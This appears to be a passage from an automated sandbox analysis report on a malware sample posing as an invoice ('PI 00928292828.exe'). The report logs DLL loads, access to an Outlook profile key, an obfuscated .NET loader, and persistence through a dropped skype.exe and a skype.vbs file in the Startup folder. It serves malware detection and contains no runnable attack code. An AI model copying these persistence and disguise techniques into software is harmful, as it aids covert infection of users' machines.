Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PI 00928292828.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PI 00928292828.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: PI 00928292828.exe

Static file information: File size 1224704 > 1048576

Source: PI 00928292828.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12a600

Source: PI 00928292828.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PI 00928292828.exe, 00000000.00000002.1704302032.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PI 00928292828.exe, 00000000.00000002.1704302032.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: PI 00928292828.exe, SorterInterpreter.cs	.Net Code: MatchSorter System.AppDomain.Load(byte[])
Source: skype.exe.0.dr, SorterInterpreter.cs	.Net Code: MatchSorter System.AppDomain.Load(byte[])
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.PI 00928292828.exe.5f40000.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.PI 00928292828.exe.5f40000.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.PI 00928292828.exe.5f40000.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.PI 00928292828.exe.5f40000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.PI 00928292828.exe.5f40000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 3.2.skype.exe.4405dd8.3.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 3.2.skype.exe.4405dd8.3.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 3.2.skype.exe.4405dd8.3.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 3.2.skype.exe.4405dd8.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 3.2.skype.exe.4405dd8.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.PI 00928292828.exe.5ee0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skype.exe.4386598.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI 00928292828.exe.5ee0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1837219390.00000000031F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1704081757.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701269663.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1691908965.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR

Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_066D65B3 push BA019280h; iretd	0_2_066D65B8
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_066D6AB7 push ebp; ret	0_2_066D6AB8
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 0_2_066D6B2F push BA019280h; iretd	0_2_066D6B34
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_00EFB3B8 push eax; iretd	1_2_00EFB455
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_00EFBB32 push es; iretd	1_2_00EFBB5C
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 1_2_06969472 push es; ret	1_2_06969480
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_064465B3 push BA013780h; iretd	3_2_064465B8
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_06446AB7 push ebp; ret	3_2_06446AB8
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 3_2_06446B2F push BA013780h; iretd	3_2_06446B34

Source: PI 00928292828.exe	Static PE information: section name: .text entropy: 7.842058230136115
Source: skype.exe.0.dr	Static PE information: section name: .text entropy: 7.842058230136115

Source: 0.2.PI 00928292828.exe.59f0000.2.raw.unpack, VD1Mau8ZNnKdSknPyOa.cs

High entropy of concatenated method names: 'hBl8NxDaoa', 'Dw18I1nQnU', 'QFf8Di6EcM', 'Lnd8ridaXu', 'C938q9hAKD', 'HTu8LdlhZY', 'smv8WyTO4N', 't4o8XAvhSV', 'sKd8FP2mfT', 'SYH8ARM3ad'

Source: C:\Users\user\Desktop\PI 00928292828.exe

File created: C:\Users\user\AppData\Roaming\skype.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\PI 00928292828.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\PI 00928292828.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs

Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs

Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
